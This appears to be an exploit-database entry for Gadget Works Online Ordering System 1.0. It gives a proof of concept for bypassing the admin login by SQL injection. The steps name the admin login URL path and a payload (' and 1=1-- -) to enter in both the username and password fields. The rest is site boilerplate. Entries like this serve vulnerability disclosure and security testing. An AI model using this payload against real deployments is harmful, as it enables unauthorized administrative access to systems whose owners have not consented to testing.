Gadget Works Online Ordering System 1.0 SQL Injection

2021.05.04

Credit: Richard Jones

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi
# Date: 03/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/13093/gadget-works-online-ordering-system-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4
Steps:
*Replace IP with the website IP
1). Goto login page (http://IP/philosophy/admin/login.php?logout=1)
2). For username and password enter for both fields the below payload and hit login.
Payload:
' and 1=1-- -

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Gadget Works Online Ordering System 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.